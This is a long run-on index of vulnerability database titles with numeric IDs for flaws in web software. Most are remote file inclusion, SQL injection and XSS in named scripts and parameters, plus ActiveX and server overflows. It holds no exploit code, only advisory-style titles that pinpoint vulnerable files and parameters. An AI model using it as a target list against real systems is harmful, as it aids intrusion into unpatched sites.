Anti-Spam Control Center Web Config aslic_status.cgi Directory Listing [37215] ClassWeb phpadmin/survey.php BASE Parameter Remote File Inclusion [37214] ClassWeb language.php BASE Parameter Remote File Inclusion [37200] Bugzilla WebService/User.pm offer_account_by_email() Function createemailregexp Arbitrary Account Creation [37186] Blue Coat K9 Web Protection k9filter.exe HTTP Get Request Remote Overflow [37185] MiniWeb HTTP Server Negative Content-Length Remote DoS [37164] PhpWebGallery picture.php author Parameter XSS [37147] escafeWeb (Tuigwaa) Unspecified Parameter XSS [37133] Webbler CMS uploader/index.php Multiple Parameter XSS [37132] Webyapar duyurular_detay Action id Parameter SQL Injection [37131] Webyapar download Action kat_id Parameter SQL Injection [37091] TinyWebGallery i_frames/i_top_tags.php URL XSS [37090] TinyWebGallery i_frames/i_login.php URL XSS [37089] TinyWebGallery index.php URL XSS [37084] PHP Webquest webquest/soporte_derecha_w.php id_actividad Parameter SQL Injection [37082] Yahoo! Webcam Upload ActiveX (ywcupl.dll) send Method Overflow [37081] Yahoo! Webcam Viewer ActiveX (ywcvwr.dll) receive Method Overflow [37078] Webace-Linkscript start.php rubrik go Action id Parameter SQL Injection [36983] Macrovision FLEXnet ActiveX (boisweb.dll) Multiple Method Overflow [36970] Apple Safari WebKit Crafted Web Page Arbitrary Java Applet Execution [36969] Apple Mac OS X WebCore Popup Cross-Domain Information Disclosure [36968] Apple Mac OS X WebCore Global Object Persistence XSS [36966] Apple Mac OS X CoreAudio Java Interface JDirect Arbitrary Code Execution [36965] Apple Mac OS X CoreAudio Java Interface Crafted Applet Remote Command Execution [36964] Apple Mac OS X CoreAudio Java Interface Crafted Applet Arbitrary Code Execution [36950] Web Community login.php3 cl_headers Parameter Remote File Inclusion [36949] Web Community menu.php3 cl_headers Parameter Remote File Inclusion [36940] Webace Linkscript go/rubrik.php id Parameter SQL Injection [36932] Webmin pam_login.cgi Multiple Parameter XSS [36874] Real Estate listing website application template Password Parameter SQL Injection [36832] @Mail Webadmin Unspecified XSS [36820] Logitech VideoCall WebCamXMP ActiveX (wcamxmp.dll) Start() Method Overflow [36805] Madirish Webmail index.php GLOBALS[basedir] Parameter Remote File Inclusion [36804] Madirish Webmail compose.php GLOBALS[basedir] Parameter Remote File Inclusion [36803] Madirish Webmail calendar.php GLOBALS[basedir] Parameter Remote File Inclusion [36802] Madirish Webmail lib/addressbook.php GLOBALS[basedir] Parameter Remote File Inclusion [36798] webSPELL gallery.php picID Parameter SQL Injection [36797] Neon Labs Website lib/nl/nl.php g_strRootDir Parameter Remote File Inclusion [36795] webSPELL gallery.php Multiple Parameter SQL Injection [36741] IBM AIX sysmgt.websm.rte (WebSM) Unspecified DoS [36731] Webmatic Administration Area Unspecified Issues [36718] British Telecommunications Business Connect webhelper btbconnectwebcontrol.dll ActiveX Multiple Unspecified Overflows [36689] WebChat defines.php WEBCHATPATH Parameter Remote File Inclusion [36631] Vivvo Article Management CMS rss/show_webfeed.php wcHeadlines [36566] WebGUI lib/WebGUI/Asset/Wobject/DataForm.pm viewList Function Information Disclosure [36555] Serendipity serendipity_event_weblogping/serendipity_event_weblogping.php serendipity[charset] Parameter Traversal Local File Inclusion [36526] GForge CVSWeb CGI cvsweb.php PATH_INFO Variable Arbitrary Command Execution [36519] rdiffWeb rdw_helpers.py path Parameter Traversal Arbitrary File Access [36511] activeWeb contentserver admin/picture/picture_real_edit.asp id Parameter SQL Injection [36465] WebStore sign_in.aspx Password Parameter SQL Injection [36463] WebEvents sign_in.aspx Password Parameter SQL Injection [36453] Apple Safari / iPhone WebKit Perl-Compatible Regular Expressions (PCRE) Multiple Overflows [36450] Apple Mac OS X / iPhone WebKit Frame Sets Unspecified Memory Corruption [36449] Apple Mac OS X / iPhone WebCore XMLHttpRequest Request CRLF Injection [36439] WebDirector index.php deslocal Parameter XSS [36429] Web News news.php config[root_ordner] Parameter Remote File Inclusion [36428] Web News feed.php config[root_ordner] Parameter Remote File Inclusion [36427] Web News index.php config[root_ordner] Parameter Remote File Inclusion [36420] Prozilla Webring category.php cat Parameter SQL Injection [36409] WebSVN filedetails.php path Parameter XSS [36350] WebStudio CMS index.php pageid Parameter XSS [36331] KeyFocus (KF) Web Server index.wkf opsubmenu Parameter XSS [36329] Web Icerik Yonetim Sistemi index.php Sayfa Page No Parameter XSS [36327] EVA-Web index.php3 Multiple Parameter Remote File Inclusion [36326] SERWeb html/mail_prepend.php _SERWEB[serwebdir] Parameter Remote File Inclusion [36325] SERWeb html/load_apu.php _SERWEB[serwebdir] Parameter Remote File Inclusion [36324] SERWeb html/load_lang.php _SERWEB[serwebdir] Parameter Remote File Inclusion [36308] W1L3D4 WEBmarket urunbak.asp id Parameter SQL Injection [36295] WebChat login.php rid Parameter SQL Injection [36274] Techno Dreams Web Directory Database.mdb Direct Request Information Disclosure [36261] activeWeb contentserver mimetype msg Parameter XSS [36260] activeWeb contentserver errors/transaction.asp msg Parameter XSS [36259] activeWeb contentserver errors/rights.asp msg Parameter XSS [36249] Mini Web Shop sendmail.php PATH_INFO Parameter XSS [36248] Mini Web Shop order_form.php PATH_INFO Parameter XSS [36224] Gnatsweb gnatsweb.pl database Parameter XSS [36213] phpMUR web/phpinfo.php XSS [36205] EmbeddedWB Web Browser ActiveX Unspecified Issue [36177] Enthrallweb eClassifieds myprofile.asp MM_recordId Arbitrary Account Manipulation [36133] Apple QuickTime for Java JDirect Support Interface Exposure Arbitrary Code Execution [36130] Apple Mac OS X WebKit Invalid Type Conversion Remote Memory Corruption Code Execution [36097] Siteframe web/classes.php LOCAL_PATH Parameter Remote File Inclusion [36075] BEA WebLogic Unspecified XSS [36074] BEA WebLogic HttpClusterServlet / HttpProxyServlet SecureProxy Admin Functionality Access [36073] BEA WebLogic Server JMS Server Direct Request Protected Queue Access [36072] BEA WebLogic LDAP Server Brute Force Login Weakness [36071] BEA WebLogic Server Administration Console Config Creation Remote Cleartext Credential Disclosure [36069] BEA WebLogic Administration Console Domain Security Policies Deployer Role Arbitrary File Upload [36068] BEA WebLogic configToScript WLST Script Config File Remote Information Disclosure [36067] BEA WebLogic Server JMS Message Bridge Access Policy Bypass [36066] BEA WebLogic Portal GroupSpace Rich Text Editor XSS [36065] BEA WebLogic Portal Visitor Entitlements Role Privilege Escalation [36064] BEA WebLogic Server Half-closed SSL Socket Access DoS [36058] Caucho Resin on Windows \web-inf Traversal Arbitrary File Access [36049] TeamSpeak Server WebAdmin ok_box.html ok_title Parameter XSS [36048] TeamSpeak Server WebAdmin error_box.html error_text Parameter XSS [36047] TeamSpeak Server WebAdmin ServerAdmin Remote Privilege Escalation [36017] CommuniGate Pro WebMail w/ MSIE STYLE Tag XSS [35986] Wallpaper Website dlwallpaper.php wallpaperid Parameter SQL Injection [35985] Wallpaper Website process.php Multiple Parameter SQL Injection [35928] WeBWorK Program Generation Translator.pm Macro Filename Protection Bypass [35891] SurgeMail NetWin Webmail Unspecified Remote Issue [35866] SAP Web Application Server frameset.htm Multiple Variable Arbitrary Site Redirection [35841] Sun Java Web Proxy Server SOCKS Support Multiple Remote Overflow [35766] IBM Lotus Domino Web Server If_Modified-Since Header Overflow [35764] IBM Lotus Domino / WebMail names.nsf User HTTPPassword Hashes Disclosure [35747] WebKalk2 engine/engine.inc.php absolute_path Parameter Remote File Inclusion [35719] Web Links lang_admin.php mx_root_path Parameter Remote File Inclusion [35717] JAF CMS forum/forum.php website Parameter Remote File Inclusion [35707] Web Wiz Forums wwforum.mdb Direct Request Database Disclosure [35690] Harpia _inc/web_statsConfig.php Multiple Parameter Remote File Inclusion [35643] Exponent CMS weblogmodule Module body Parameter XSS [35634] Multiple Vendor WebAPP Menu Manager Mod Personal Menu Item Title Arbitrary Code Execution [35585] Eba News webpages.php filename Parameter Remote File Inclusion [35552] CafeLog B2 Weblog and News Publishing Tool b2mail.php b2inc Parameter Remote File Inclusion [35551] CafeLog B2 Weblog and News Publishing Tool b2categories.php b2inc Parameter Remote File Inclusion [35550] CafeLog B2 Weblog and News Publishing Tool b2archives.php b2inc Parameter Remote File Inclusion [35541] Progress Webspeed OpenEdge WService=wsbroker1/_edit.r Remote DoS [35529] LiveData Protocol Server HTTP/SOAP Interface Crafted WSDL File Request Overflow [35518] Mbedthis AppWeb Corrupt File Handle Unspecified DoS [35517] Mbedthis AppWeb on Windows Mixed Case URL Unspecified Bypass [35516] Mbedthis AppWeb HEAD / TRACE Handler Unspecified Issue [35513] Mbedthis AppWeb /esp Access Unspecified Remote DoS [35512] Mbedthis AppWeb Logfile Rotation Unspecified Issue [35511] Mbedthis AppWeb HTTP TRACE Method XSS [35510] Mbedthis AppWeb URL Protocol Format String [35492] Progress WebSpeed Messenger scripts/wsisa.dll Arbitrary File Execution [35491] Progress WebSpeed Messenger scripts/cgiip.exe Arbitrary File Execution [35490] Progress WebSpeed Messenger WService Parameter Information Disclosure [35483] Sun Java Web Start JNLP File Unspecified Privilege Escalation [35466] Pi3Web Long URI Request Processing DoS [35369] Asterisk Manager Interface Passwordless User MD5 Authentication DoS [35367] phpwebnews bukutamu.php m_txt Parameter XSS [35366] phpwebnews index.php m_txt Parameter XSS [35365] phpwebnews iklan.php m_txt Parameter XSS [35363] Ripe Website Manager contact/index.php ripeformpost Parameter SQL Injection [35362] Ripe Website Manager contact/index.php ripeformpost Parameter XSS [35360] Maian Weblog index.php path_to_folder Parameter Remote File Inclusion [35290] Gsylvain35 Portail Web Php (PWP) index.php pageAll Parameter Remote File Inclusion [35286] WebBlizzard CMS PHPSESSID Cookie Session Fixation [35285] WebBlizzard CMS index_cms.php Suchzeile XSS [35271] Mbedthis AppWeb ESP Handler Unspecified Memory Leak Issue [35261] WEBinsta FM Manager admin/login.php absolute_path Parameter Remote File Inclusion [35229] web-app.net WebAPP cgi-lib/subs.pl List File Access Weakness [35228] Company WebSite Builder (CWB) include/cls_viewpastorders.php INCLUDE_PATH Parameter Remote File Inclusion [35227] Company WebSite Builder (CWB) include/cls_listorders.php INCLUDE_PATH Parameter Remote File Inclusion [35226] Company WebSite Builder (CWB) include/cls_headline_prod.php INCLUDE_PATH Parameter Remote File Inclusion [35219] web-app.net WebAPP cgi-bin/user-lib/topics.pl XSS [35218] web-app.net WebAPP cgi-bin/admin/logs.cgi Statistics Log Viewer Unspecified XSS [35217] web-app.net WebAPP cgi-lib/user-lib/search.pl Search Function XSS [35216] web-app.net WebAPP cgi-lib/user-lib/search.pl srch Variable show_recent_searches Function XSS [35215] web-app.org WebAPP Multiple Unspecified Form XSS [35214] web-app.org WebAPP Drop Down QUERY_STRING XSS [35213] web-app.net WebAPP Multiple Unspecified Issues [35212] web-app.org WebAPP Username Hijacking Patch Unspecified Issue [35181] Horde Webmail ingo/rule.php XSS [35176] Study Planner (Studiewijzer) ws/spl.webservice.php SPL_CFG[dirroot] Parameter Remote File Inclusion [35071] WEBO (Web Organizer) foldertree.php baseDir Parameter Remote File Inclusion [35047] WebCalendar get_events.php includedir Parameter Remote File Inclusion [35046] WebCalendar get_reminders.php includedir Parameter Remote File Inclusion [35045] WebCalendar login.php includedir Parameter Remote File Inclusion [35033] WebCreator http/load.inc.php moddir Parameter Remote File Inclusion [35032] WebCreator config/load.inc.php moddir Parameter Remote File Inclusion [35031] WebCreator content/load.inc.php moddir Parameter Remote File Inclusion [35018] Novell GroupWise WebAccess GWINTER.exe Basic Authentication Base64 Decoding Overflow [34996] my little weblog weblog.php id Parameter XSS [34992] webMethods Glue Management Console resource Parameter Traversal Arbitrary File Access [34974] MailBee WebMail Pro check_login.asp username Parameter XSS [34958] Zeus Technologies Zeus Web Server HTTP Header Injection [34950] webSPELL Add Squad Feature Unrestricted File Upload Arbitrary PHP Code Execution [34949] webSPELL ws_auth Cookie SQL Injection [34948] BJ Webring formulaire.php Add Link Menu XSS [34946] Company WebSite Builder (CWB) comanda.php INCLUDE_PATH Parameter Remote File Inclusion [34902] Sun Java Web Console libwebconsole_services.so Remote Format String [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS [34871] Apple Mac OS X load_webdav File System Mount Local Privilege Escalation [34866] Apple Mac OS X WebFoundation Framework Subdomain Cookie Information Disclosure [34860] Apple Mac OS X Libinfo Crafted Web Page Unspecified Remote Code Execution [34855] Apple Mac OS X IOKit HID Interface Local Privilege Escalation [34792] Joomla! Weblinks models/category.php catid Parameter SQL Injection [34733] Samba DFS RPC Interface DFSEnum Request Remote Overflow [34732] Samba SPOOLSS RPC Interface RFNPCNEX Request Remote Overflow [34731] Samba SRVSVC RPC Interface NetSetFileSecurity Request Remote Overflow [34699] Samba LSA RPC Interface Multiple Function Remote Overflow [34694] freePBX upgrade.php amp_conf[AMPWEBROOT] Parameter Remote File Inclusion [34638] webSPELL picture.php file Parameter Traversal Arbitrary File Access [34637] webSPELL picture.php file Variable Direct Request Arbitrary File Access [34633] Jinzora extras/mt.php web_root Parameter Remote File Inclusion [34630] HP Mercury Quality Center TDAPI_GeneralWebTreatment RunQuery() Method SQL Injection [34585] CA Multiple Products inoweb Console Server Authentication Remote Overflow [34581] Kaqoo Auction Software Free Edition include/interfaces.inc.php install_root Parameter Remote File Inclusion [34537] Data Domain OS Command Line Interface Arbitrary Command Execution [34530] CipherTrust IronMail admin/systemWebAdminConfig.do Multiple Parameter XSS [34504] NaviCOPA Web Server Crafted GET Request DoS [34503] NaviCOPA Web Server cgi-bin / cgi GET Request Overflow [34500] Web Content System formjavascript.php path[JavascriptEdit] Parameter Remote File Inclusion [34484] IBM WebSphere Application Server (WAS) Crafted Header HTTP Response Splitting [34443] WebMplayer filecheck.php id[0] Parameter SQL Injection [34442] WebMplayer index.php strid Parameter SQL Injection [34441] WebMplayer index.php Shell Metacharacter Arbitrary Code Execution [34439] eWebquiz ewebquiz.asp Multiple Parameter SQL Injection [34438] BRS WebWeaver testcgi.exe Information Disclosure [34425] XchangeBoard DBInterface.php Multiple Parameter SQL Injection [34419] aspWebCalendar FREE calendar.asp eventid Parameter SQL Injection [34389] Microsoft Exchange Outlook Web Access (OWA) Attachment Script Injection [34346] IBM Rational ClearQuest (CQ) Web defect Log Entry Attachment XSS [34344] Web Wiz Forums functions/functions_filters.asp formatSQLInput() Function SQL Injection [34331] IncrediMail IMMenuShellExt ActiveX (ImShExt.dll) DoWebMenuAction Function Overflow [34329] Microgaming Download Helper ActiveX (dlhelper.dll) / WebHandler Class Control Unspecified Overflow [34310] ViperWeb Portal index.php modpath Parameter Remote File Inclusion [34307] Takebishi DeviceXPlorer Multiple OPC Server OPCDA Interface IOPCServer::RemoveGroup Function Improper Server Handle Handling [34293] Reptile Web Server Malformed GET Request DoS [34292] Borland Web Server (BWS) Multiple Traversal Method Arbitrary File Access [34181] Ezboo webstats Direct Request Authentication Bypass [34177] IBM WebSphere Application Server (WAS) Crafted URL JSP Source Disclosure (PK00091) [34154] Apache Axis Nonexistent Java Web Service Path Disclosure [34103] Microsoft Windows Web Proxy Autodiscovery Protocol (WPAD) DNS Subversion [34100] Microsoft Windows DNS RPC Interface Zone Name Remote Overflow [34080] Sun Java System Web Server Unspecified Information Disclosure [34074] Sun Java System Web Server Certificate Revocation List (CRL) Bypass [34043] Cyber-Inside WebLog index.php showarticles Action file Parameter Traversal Arbitrary File Access [34013] Web Group Communication Center quiz.php qzid Parameter SQL Injection [33916] VAMP Webmail yesno.phtml no_url Parameter Remote File Inclusion [33886] Novell Netmail WebAdmin HTTP Basic Authentication Username Overflow [33875] Advanced Website Creator Multiple Unspecified SQL Injection [33874] rdiffWeb /browse/ path Variable Encoded Traversal Arbitrary Direcotry Listing [33867] WebCalendar includes/functions.php noSet Variable Overwrite [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow [33834] WebMod server.cpp connectHandle Function Content-Length HTTP Header Overflow [33832] Webmin/Usermin chooser.cgi Crafted Filename XSS [33825] aWebNews visview.php path_to_news Parameter Remote File Inclusion [33824] aWebNews listing.php path_to_news Parameter Remote File Inclusion [33820] Mirapoint WebMail expression CSS XSS [33793] SHOUTcast Incoming Interface Logfile XSS [33762] PHPWebGallery Search.php Multiple Parameter XSS [33761] PHPWebGallery Register.php Multiple Parameter XSS [33744] JBoss Console / Web Management Direct Request Authentication Bypass [33704] XOOPS Weblinks Module class/table_broken.php lid Parameter SQL Injection [33701] PHP-Nuke Weblinks Section Reviews Section Unspecified SQL Injection [33697] SAP WebAS Named Pipe Access Local Privilege Escalation [33696] SAP WebAS enserver.exe Malformed Input Remote DoS [33695] SAP WebAS enserver.exe Traversal Arbitrary File Access [33634] Portail Web Php index.php page Parameter Traversal Arbitrary File Access [33633] Portail Web Php includes/includes.php site_path Parameter Remote File Inclusion [33627] Microsoft Vista Speech Recognition Web Page Arbitrary Command Execution [33609] OpenEMR interface/login/login_frame.php rootdir Parameter XSS [33607] WebBuilder StageLoader.php GLOBALS[core][module_path] Parameter Remote File Inclusion [33569] IBM WebSphere ibm_security_logout logoutExitPage Parameter Arbitrary URL Redirection [33568] IBM WebSphere j_security_check Crafted POST Request Arbitrary URL Redirection [33565] Novell GroupWise Web Server Content-Location Header Internal IP Disclosure [33532] Macrovision FLEXnet Connect Update Service Agent isusweb.dll Overflow [33531] Macrovision InstallShield InstallFromTheWeb Netscape Plug-in (npiftw32.dll) Remote Overflow [33530] Macrovision InstallShield InstallFromTheWeb iftw.dll ActiveX Remote Overflow [33529] Hitachi JP1/Cm2/Network Node Manager Web Utility Function Unspecified Issue [33514] MiniWebsvr Multiple Unspecified Issues [33513] MiniWebsvr Encoded Traversal Arbitrary File Access [33512] MiniWebsvr Multiple Unspecified Overflows [33483] Google Desktop Advanced Search Internal Web Server XSS [33442] Durian Web Application Server Crafted Packet Remote Overflow [33439] Magic Photo Storage Website user/user_membership_password.php _config[site_path] Parameter Remote File Inclusion [33438] Magic Photo Storage Website user/user_extend.php _config[site_path] Parameter Remote File Inclusion [33437] Magic Photo Storage Website user/user_email.php _config[site_path] Parameter Remote File Inclusion [33436] Magic Photo Storage Website user/user_catelog_password.php _config[site_path] Parameter Remote File Inclusion [33435] Magic Photo Storage Website user/upload_photo.php _config[site_path] Parameter Remote File Inclusion [33434] Magic Photo Storage Website user/register.php _config[site_path] Parameter Remote File Inclusion [33433] Magic Photo Storage Website user/logout.php _config[site_path] Parameter Remote File Inclusion [33432] Magic Photo Storage Website user/login.php _config[site_path] Parameter Remote File Inclusion [33431] Magic Photo Storage Website user/index.php _config[site_path] Parameter Remote File Inclusion [33430] Magic Photo Storage Website user/delete_category.php _config[site_path] Parameter Remote File Inclusion [33429] Magic Photo Storage Website user/couple_profile.php _config[site_path] Parameter Remote File Inclusion [33428] Magic Photo Storage Website user/couple_milestone.php _config[site_path] Parameter Remote File Inclusion [33427] Magic Photo Storage Website user/change_catalog_template.php _config[site_path] Parameter Remote File Inclusion [33426] Magic Photo Storage Website user/add_news.php _config[site_path] Parameter Remote File Inclusion [33425] Magic Photo Storage Website user/add_category.php _config[site_path] Parameter Remote File Inclusion [33423] Magic Photo Storage Website include/db_config.php _config[site_path] Parameter Remote File Inclusion [33422] Magic Photo Storage Website include/config.php _config[site_path] Parameter Remote File Inclusion [33421] Magic Photo Storage Website admin/send_email.php _config[site_path] Parameter Remote File Inclusion [33420] Magic Photo Storage Website admin/membership_pricing.php _config[site_path] Parameter Remote File Inclusion [33419] Magic Photo Storage Website admin/list_members.php _config[site_path] Parameter Remote File Inclusion [33418] Magic Photo Storage Website admin/index.php _config[site_path] Parameter Remote File Inclusion [33417] Magic Photo Storage Website admin/delete_member.php _config[site_path] Parameter Remote File Inclusion [33416] Magic Photo Storage Website admin/approve_member.php _config[site_path] Parameter Remote File Inclusion [33415] Magic Photo Storage Website admin/admin_paypal_email.php _config[site_path] Parameter Remote File Inclusion [33414] Magic Photo Storage Website admin/add_templates.php _config[site_path] Parameter Remote File Inclusion [33413] Magic Photo Storage Website admin/admin_email.php _config[site_path] Parameter Remote File Inclusion [33412] Magic Photo Storage Website admin/add_welcome_text.php _config[site_path] Parameter Remote File Inclusion [33411] Magic Photo Storage Website admin/admin_password.php _config[site_path] Parameter Remote File Inclusion [33401] Webulas db/db.mdb Direct Request Database Disclosure [33303] TYPOlight webCMS Unspecified Major Security Issue [33301] web-app.org WebAPP User Profiles Unspecified XSS [33300] Avaya Multiple Products Unspecified Web Page Shell Command Injection [33299] web-app.org WebAPP Search Form Input Unspecified Hijacking [33298] web-app.org WebAPP Forum Archive Functionality Information Disclosure [33296] web-app.org WebAPP Latest Member Personal Information Disclosure [33295] web-app.org WebAPP Multiple Form Hidden Input Unspecified Issue [33294] web-app.org WebAPP CAPTCHA Default Installation Weakness [33293] web-app.org WebAPP White Space Arbitrary Real Name Spoofing [33292] web-app.org WebAPP Unauthorized Guest Profile Modification [33291] web-app.org WebAPP Edit Profile Forms Multiple Input Validation Issues [33290] web-app.org WebAPP Search Results XSS [33289] web-app.org WebAPP Statistics Log Viewer XSS [33288] web-app.org WebAPP Feedback Pages XSS [33287] web-app.org WebAPP Gallery Unspecified Input Filtering Weakness [33286] web-app.org WebAPP Forum Post Icon Field HTML Injection [33285] web-app.org WebAPP Unspecified Forms referrer Validation Weakness [33284] web-app.org WebAPP Multiple Function E-mail Address Validation Weakness [33283] web-app.org WebAPP Profiles Unspecified HTML Injection [33282] web-app.org WebAPP Image Uploader Access Check Unspecified Weakness [33281] web-app.org WebAPP Recent Searches Information Disclosure [33279] web-app.org WebAPP Multiple Administrative Function Access Check Unspecified Weakness [33277] web-app.org WebAPP Global Query String Filter Unspecified Weakness [33276] web-app.org WebAPP Gallery Comments XSS [33275] web-app.org WebAPP Admin Feature Unspecified XSS [33273] web-app.org WebAPP Unspecified Cookie Manipulation Security Bypass [33272] web-app.org WebAPP Multiple Unspecified Issues [33240] cPanel WebHost Manager (WHM) scripts2/objcache obj Variable Arbitrary Limited File Overwrite [33239] cPanel WebHost Manager (WHM) scripts/rearrangeacct domain Parameter XSS [33238] cPanel WebHost Manager (WHM) scripts2/dofeaturemanager feature Parameter XSS [33237] cPanel WebHost Manager (WHM) scripts2/limitbw domain Parameter XSS [33236] cPanel WebHost Manager (WHM) scripts2/changeemail domain Parameter XSS [33231] webSPELL printview.php topic Parameter SQL Injection [33230] webSPELL index.php getsquad Parameter SQL Injection [33229] webSPELL news.php showonly Parameter SQL Injection [33204] WebTester Unspecified GET/POST SQL Injection [33203] WebTester directions.php typeID Parameter SQL Injection [33202] WebTester Multiple Unspecified XSS [33191] MailEnable Web Mail Client link / IMG Tag CSRF [33190] MailEnable Web Mail Client Forms/VCF/list.asp Multiple Parameter XSS [33189] MailEnable Web Mail Client Forms/MAI/list.asp Multiple Parameter XSS [33188] MailEnable Web Mail Client right.asp Multiple Parameter XSS [33184] Aruba Mobility Controller Management Interface Login Prompt Credentials String Remote Overflow [33174] Plain Old Webserver URI Traversal Arbitrary File Access [33143] webSPELL ws_auth Cookie Authentication Bypass [33126] Webmatic index/index_album.php Multiple Parameter Remote File Inclusion [33118] J-Web Pics Navigator pn-menu.php dir Parameter Traversal Arbitrary File Access [33117] J-Web Pics Navigator jwpn-photos.php dir Parameter Traversal Arbitrary File Access [33015] Webfwlog include/debug.php conffile Variable Traversal Arbitrary File Source Disclosure [32998] Hitachi Web Server Image Maps XSS [32997] Hitachi Web Server HTTP Expect Header XSS [32992] WebGUI www_purgeList Method Arbitrary Asset Deletion [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation [32973] Atozed IntraWeb TIWServerController Object Crafted HTTP Request DoS [32965] CGI Rescue WebFORM Unspecified HTTP Header XSS [32964] CGI Rescue WebFORM Unspecified XSS [32961] Symantec Web Security (SWS) Blocked Page XSS [32960] Symantec Web Security (SWS) Error Page XSS [32951] FreeWebShop.org includes/login.php lang_file Parameter Remote File Inclusion [32945] Website Baker class.login.php REMEMBER_KEY Cookie Parameter SQL Injection [32928] WebGUI Operation/User.pm username Parameter XSS [32893] Oracle E-Business Suite Web Applications Desktop Integrator Unspecified Issue [32866] Fritz!DSL AR7 Web Server Traversal Arbitrary File Access [32859] BEA WebLogic Malformed Headers Disk Space Consumption DoS [32858] BEA WebLogic Manipulated Socket Connection Remote DoS [32857] BEA WebLogic Portal Inadvertent Access Restriction Removal [32856] BEA WebLogic Server Proxy Plug-in for NES Unspecified Remote DoS [32824] FdWeB Espace Membre _admin/admin_menu.php path Parameter Remote File Inclusion [32819] Okul Web Otomasyon Sistemi etkinlikbak.asp id Parameter SQL Injection [32813] WebGUI Wiki Page Title XSS [32803] Direct Web Remoting (DWR) Crafted Input Infinite Loop DoS [32741] F5 FirePass vdesk/admincon/webyfiers.php Multiple Parameter XSS [32718] MOTIONBORG Web Real Estate admin_check_user.asp txtUserName Parameter SQL Injection [32681] Enthrallweb eShopping Cart products.asp categoryid Parameter SQL Injection [32680] Enthrallweb eShopping Cart productdetail.asp ProductID Parameter SQL Injection [32677] Online Web Building page.asp art_id Parameter SQL Injection [32668] Magic Photo Storage Website include/common_function.php _config[site_path] Parameter Remote File Inclusion [32662] Sun iPlanet Web Server /search NS-max-records XSS [32658] Direct Web Remoting (DWR) Batch Request Resource Consumption DoS [32657] Direct Web Remoting (DWR) Crafted Request include/exclude Check Bypass [32639] Web Directory Pro admin/options.php Unauthorized Configuration Modification [32638] Web Directory Pro admin/backup_db.php Database Disclosure [32618] Business Card Web Builder (BCWB) system/default.css.php root_path_admin Parameter Remote File Inclusion [32617] Business Card Web Builder (BCWB) dcontent/default.css.php root_path_admin Parameter Remote File Inclusion [32616] Business Card Web Builder (BCWB) include/startup.inc.php root_path_admin Parameter Remote File Inclusion [32537] AIDeX Mini-Webserver HTTP Request Saturation DoS [32529] Joomla! plugins/search/weblinks.php where Parameter SQL Injection [32508] WebText CMS wt/users/ im Variable Profile Edit (edycja) Arbitrary PHP Command Injection [32501] Allied Telesis AT-9000/24 Management Interface VLAN Restriction Bypass [32456] Enthrallweb eNews myprofile.asp Arbitrary Account Profile Manipulation [32455] Enthrallweb eJobs newsdetail.asp ID Parameter SQL Injection [32454] Enthrallweb ePages actualpic.asp Biz_ID Parameter SQL Injection [32452] Enthrallweb ePhotos subLevel2.asp SUB_ID Parameter SQL Injection [32451] Enthrallweb emates newsdetail.asp ID Parameter SQL Injection [32404] @Mail Webmail Unspecified XSS [32403] @Mail Webmail util.pl CSRF [32392] Mono XSP for ASP.NET Server System.Web Class Web.Config Credential Disclosure [32391] Mono XSP for ASP.NET Server System.Web Class %20 Request Script Source Code Disclosure [32353] WebCalendar export_handler.php format Parameter XSS [32332] phpMyWebmin upload_multi.php target Parameter Remote File Inclusion [32331] phpMyWebmin upload_local.php target Parameter Remote File Inclusion [32330] phpMyWebmin create_file.php target Parameter Remote File Inclusion [32329] phpMyWebmin change_preferences2.php target Parameter Remote File Inclusion [32255] Hitweb Multiple Script REP_CLASS Parameter Remote File Inclusion [32143] IBM WebSphere Host On-Demand Multiple Script pnl Parameter Authentication Bypass [32120] ColdFusion Web Server User-Agent HTTP Header Error Message XSS [32090] Twilight Utilities Web Server (TW-webserver) GET Request Overflow DoS [32075] Barman interface.php basepath Parameter Remote File Inclusion [32044] cPanel WebHost Manager (WHM) scripts/passwdmysql password Parameter XSS [32029] Trend Micro OfficeScan PCCSRV\Web_console\RemoteInstallCGI\CgiRemoteInstall.exe Remote Overflow [32028] Trend Micro OfficeScan PCCSRV\Web_console\RemoteInstallCGI\Wizard.exe Remote Overflow [31965] thttpd on Gentoo Linux Misconfigured Webroot Arbitrary File Access [31904] WAWI /browse Interface Traversal Arbitrary File Access [31849] Open WebMail (OWM) Unspecified XSS [31848] Open WebMail (OWM) openwebmail-main.pl Multiple XSS [31808] XEROX WorkCentre Products Web Services Request Persistant HTTP Connection [31757] cPanel WebHost Manager (WHM) park ndomain Parameter XSS [31756] cPanel WebHost Manager (WHM) dofeaturemanager feature Parameter XSS [31755] cPanel WebHost Manager (WHM) editzone domain Parameter XSS [31754] cPanel WebHost Manager (WHM) domts2 domain Parameter XSS [31753] cPanel WebHost Manager (WHM) editpkg pkg Parameter XSS [31752] cPanel WebHost Manager (WHM) addon_configsupport.cgi supporturl Parameter XSS [31751] cPanel WebHost Manager (WHM) dochangeemail email Parameter XSS [31720] SquirrelMail webmail.php mailto Parameter XSS [31681] Enthrallweb eCars Types.asp Type_id SQL Injection [31661] Mambo weblinks.php catid SQL Injection [31660] UebiMiau Webmail error.php icq Parameter XSS [31657] Simple Web Content Management System page.php id Parameter SQL Injection [31650] Raindance Web Conferencing Pro failed browser XSS [31628] Web Wiz Forums forum/search.asp KW Parameter SQL Injection [31590] Mini Web Shop viewcategory.php catname Path Disclosure [31589] Mini Web Shop viewcategory.php catname XSS [31521] AlstraSoft Web Host Directory Database Download [31520] AlstraSoft Web Host Directory Admin Passwod Modification [31519] AlstraSoft Web Host Directory Invalid URI Path Disclosure [31515] Enthrallweb eCoupons myprofile.asp MM_recordId Account Modification [31413] Oracle Application Server Containers for J2EE Web Services Security Information Disclosure [31366] Novell NetWare Welcome web-app Unspecified Filter Bypass [31365] Novell NetWare Welcome web-app Unspecified XSS [31222] OmniWeb Javascript alert() Function Format String [31133] SolidState ServicesWebHostingPage.class.php base_path Parameter Remote File Inclusion [31040] aspWebLinks links.asp txtAdministrativePassword Admin Password Modification [30998] DEV Web Manager System index.php action Parameter XSS [30953] ICQ Toolbar Configuration Webpage Origin Verification Failure [30944] IBM WebSphere Application Server (WAS) SOAP Port Error Message XSS [30935] IBM WebSphere Application Server (WAS) FFDC Log Cleartext Credential Disclosure (PK17589) [30897] WebYep WYURL.php webyep_sIncludePath Parameter Remote File Inclusion [30887] Jinzora media.php web_root Parameter Remote File Inclusion [30879] 